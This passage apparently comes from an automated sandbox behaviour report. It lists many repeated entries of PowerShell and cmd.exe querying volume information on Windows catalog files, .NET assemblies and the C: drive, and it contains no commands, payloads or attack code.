    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
